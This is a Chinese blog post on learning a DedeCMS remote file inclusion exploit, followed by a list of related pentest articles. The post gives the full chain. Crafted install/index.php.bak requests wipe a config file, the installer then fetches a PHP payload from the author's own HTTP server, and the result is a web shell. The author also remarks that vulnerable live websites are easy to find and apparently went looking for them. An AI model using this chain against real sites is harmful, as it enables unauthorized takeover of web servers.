Web渗透学习-织梦CMS-RFI

最新推荐文章于 2024-05-02 04:10:46 发布
最新推荐文章于 2024-05-02 04:10:46 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: 技术杂项
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Garfy_/article/details/46817361
版权

今天学习了exploit-db上面的一个漏洞,是织梦CMS最新版本的RFI(远程文件包含)。

织梦CMS最新版本的安装文件中仍然采用覆盖变量的方式更新系统,并且存在一些关键变量存储更新系统的路径信息,因此可以通过覆盖变量的方式来获取shell。

大致可以分为三步:


1.清空/data/config_update.php中的信息。

http://127.0.0.1/install/index.php.bak
?step=11
&insLockfile=a
&s_lang=a
&install_demo_name=../data/admin/config_update.php

2.自己开一台服务器,假设是192.168.3.162,在服务器中写一个简单的脚本(但是不能保存成php类型)。

$ifconfig en0
$mkdir "dedecms"
$cd dedecms
$echo "<?php phpinfo();?>" > demodata.a.txt
$python -m SimpleHTTPServer


3.获取shell。

http://127.0.0.1/install/index.php.bak
?step=11
&insLockfile=a
&s_lang=a
&install_demo_name=hello.php
&updateHost=http://192.168.3.162:8000/


接下来可以验证一下,访问hello.php就好。 

http://127.0.0.1/install/hello.php




漏洞原理不难,但是想发现还是不容易的。而且这个漏洞仅限于一般用户(因为install属于安装后可以删除的文件夹),但是在实际找的时候还是发现很多网站没有删除。

还没有找真正的网站去试,不过却偶然发现了一个弱口令,希望能获得一枚乌云账号吧~

---------------------------

更新:这个漏洞还是很好找网站的~随便那么一找就找到啦

GarD0u
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
教育科研-学习工具-SCART端口接地装置及具有此接地装置的机顶盒.zip
08-13
良好的接地可以降低信号失真,防止电磁干扰(EMI)和射频干扰(RFI)对视频信号的影响。在SCART连接中,如果接地不充分,可能会导致图像闪烁、颜色失真或其他图像质量问题。 机顶盒作为接收和处理电视信号的设备,...
120.网络安全渗透测试—[CMS后台 getwebshell]—[织梦dedecms5.7后台 getwebshell]
qwsn
07-10 2790
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! (1)进入后台:模块–>文件管理器---->上传文件---->shell.php,内容为 (2)访问:\shell.php(1)进入后台:模块–>文件管理器–>新建文件–>写入wshell.php,内容为 (2)访问:\wshell.php (3)访问:\shell0.php (1)进入后台:系统–>系统基本参数–>核心配置–>专题最大的节点数或FTP端口写入 (2)访问:data\config.cache.inc.php....
Dedecms的另类渗透
qq_40162181的博客
07-17 356
Dedecms的另类渗透前言背景第一步:网站信息收集 前言 这个案子完成已有一段时间,早该总结的,先自我批评一下。之所以说是“另类渗透”,严格来说这次渗透是没有成功的,服务器的权限没有拿到,但是拿到了想要的数据。 背景 要获取一个Dedecms 网站的数据,网站后台:未知,账号、密码未知。 第一步:网站信息收集 这位大神这篇帖子讲渗透讲得很好,附上链接:https://blog.csdn.net/qq_36119192/article/details/84674109 对一个cms(内容分发网站),首先要判
渗透学习-23- WEB 攻防-Python 考点&amp;CTF 与 CMS-SSTI 模版注入&amp;PYC 反编译
最新发布
2301_76268112的博客
05-02 34
举个例子,我想买裙子,这时候我会打开某宝,直接在搜索框输入“裙子”,就会出现跟裙子相关的一系列商品,各种颜色,各种样式。那我们来想一下,这么多商品的各种信息是直接全部写死在页面上的嘛?那我们每次查找的商品都不一样,需要的内存就太大了很显然,并不是,所以这里就体现了我们模板引擎的作用,它可以根据从数据库中实时提取出来的数据对html页面实时的渲染,这,就是模板引擎。漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,
织梦cms网站安全防护设置
火狼网络
10-18 1239
总所周知织梦系统是目前开源CMS系统中,使用人数最多的系统之一,所以也被黑客们盯上了,官方对于系统的更新速度也比较慢,所以大家只能自己做好防范工作,这样才能更好的确保网站的安全性。 一:尽量不要使用香港、国外等虚拟空间。 这类虚拟空间,安全性非常低,几百甚至几千个用户的网站都放在一台服务器上,一旦其中的某个网站被攻击,正好他也是织梦系统,那么你的完整就很容易被连带攻击。大家想一下,为什么你
php简单后台模板_渗透测试入门 —— 真的很简单
weixin_34395361的博客
01-13 413
1.本题是渗透测试入门的一道基础题,虽然美其名曰“真的很简单”,但对于新手还是有一定挑战性的,实践并掌握本题中的所有知识点,对渗透测试的基本理解有很大帮助。此题的目标是对一个基于织梦 CMS 的网站进行渗透测试,找到网站登录后台,继而入侵服务器找到存放 flag 的文件。从实验手册上,可看出其中还会涉及到简单的提权过程。题目链接:https://www.ichunqiu.com/battalion...
渗透实战:dedeCMS任意用户密码重置到内网getshell
niobi的博客
05-05 2052
DedeCMS是一款国产的开源CMS系统,具有使用简单、功能强大、可扩展性好等特点。然而,像其他CMS系统一样,DedeCMS也存在一些安全问题,其中任意密码重置漏洞是其中一个比较严重的漏洞。通过信息泄露,攻击者可以获取到网站的用户的用户名和一些敏感信息,然后通过利用任意密码重置漏洞,在不知道原密码的情况下,重置管理员账号的密码,从而获取管理员权限。接着,攻击者可以通过后台getshell,获取网站的控制权,进而进行各种恶意操作,如上传恶意文件、篡改网站内容、窃取用户信息等。
Web-安全渗透全套教程文件包含漏.zip
05-22
【标题】:“Web-安全渗透全套教程文件包含漏洞”指的是一个关于网络安全的教程,特别是针对Web应用程序的安全渗透测试。在Web开发中,"文件包含漏洞"是一个常见的安全问题,它允许攻击者通过注入恶意代码来控制或...
rfi-webgl-client:用于RFI的WebGL客户端
05-13
RFI:前体客户端 这是RFI的WebGL客户端:前体MMORPG。 这是一项实验性的尝试,试图了解MMO客户在纯网络技术中的可行性。 当前状态 现在,它可以执行与服务器的登录,四处移动以及共享状态。 这是网络的视频: ...
HDMI-Cable-设计规范.pdf
07-14
3. **屏蔽层**:为了减少电磁干扰(EMI)和射频干扰(RFI),HDMI线需要有良好的屏蔽层,通常包括铝箔和金属编织网。编织屏蔽覆盖率应达到一定标准,确保信号的纯净。 4. **连接器**:HDMI线两端的连接器,即HDMI...
2 - RFI system level test procedureRev1.3.zip
10-01
RFI系统级测试流程详解》 在无线通信领域,RFI(Radio Frequency Interference,射频干扰)是一项至关重要的考量因素。RFI系统级测试是确保设备在真实环境中能够正常运行、避免信号干扰的关键步骤。本文将深入...
dedecms
tlucky的博客
04-17 3239
1.收集信息 美国 纽约州 纽约 nmap扫描 PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3306/tcp open mysql 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open
渗透测试入门 —— 真的很简单
m0_59236127的博客
03-03 475
1.本题是渗透测试入门的一道基础题,虽然美其名曰“真的很简单”,但对于新手还是有一定挑战性的,实践并掌握本题中的所有知识点,对渗透测试的基本理解有很大帮助。此题的目标是对一个基于织梦 CMS 的网站进行渗透测试,找到网站登录后台,继而入侵服务器找到存放 flag 的文件。从实验手册上,可看出其中还会涉及到简单的提权过程。题目链接:解题链接:本次实验要求获取目标网站的FLAG信息。2.网站管理员的密码是多少?第 1 题相对简单,在实验环境内根据提示打开下载链接。
渗透测试-地基篇-Webshell-织梦dedecms框架(八)
qq_34801745的博客
11-25 1519
** 渗透测试-地基篇-Webshell-织梦dedecms框架(八) ** 作者:大余 时间:2020-11-25 简介: 渗透测试-地基篇: 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。 请注意: 对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 名言: 你对这行的兴趣
dedecms漏洞组合拳拿站(渗透笔记)
热门推荐
一个安全研究员
07-13 1万+
如题
一次旁站信息泄露的dedecms站点渗透
zhangge3663的博客
11-26 891
今天又是准备划水认真工作的一天,没想到一到公司领导就甩了个站过来,这可能就是打工人吧 话不多说来看看站,先信息收集一波 初步测试目标站点 打开进去是一个类似购物商城的地方,没有什么特殊的点,想要操作基本都要进行登录,中间件是nginx 再看看插件,惊喜来了,是dedecms 先直接盲打一波后台地址/dede 直接404...... 再看看好歹有前台,先注册个用户 再查看最后更新时间 可以知道是dedecms v5.7 sp2的版本 这个版本之后有前台管理员密码重置漏洞和任意密码重
渗透测试实战--dedecms漏洞复现
qq_45070118的博客
08-18 5535
实验设备:一台windows服务器,一台kali,一台windows客户端 在虚拟机WIN7上使用phpstudy搭站(解压文件将文件放置在phpstudy配置文件WWW中),使用物理机进行攻击,WIN7 IP为192.168.10.5 物理机安装jdk,建立java环境,由此来运行菜刀 网页链接是WWW后的路径(http://ip/dedecms/uploads) 根据文件存放位置来定在物理机...
一次特别的DedeCMS站点渗透
moon fairy's blog
07-23 4825
 一系列故事的开端: 这是搜到的一个Dede站点的后台 路径为/dede  获得到该站点的用户名以及密码后(这里不具体说明),输入用户名和密码之后就进入了后台,并且下意识的打开了文件管理器 不过管理员也不是等闲之辈,早已卸载该模块 于是,我找到了另一处可以生成PHP文件的地方 在”标签源码管理“这里可以创建PHP脚本文件 去掉默认的代码,写入eval代码,点击保存,文...
记一次织梦cms渗透测试
weixin_30776545的博客
08-08 1132
记一次织梦cms渗透测试 0x01 前言 本次测试的整个流程:枚举用户名 - 针对性暴破 - 登录后台 - 后台编辑php文件getshell。 0x02 过程 1、登录功能模块存在用户名枚举缺陷,利用此权限先枚举出用户名 2、登录功能模块无验证码,通过枚举出的用户名暴力破解出相应密码。并登录后台(dedecms v57) 3、开始遇到坑了。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值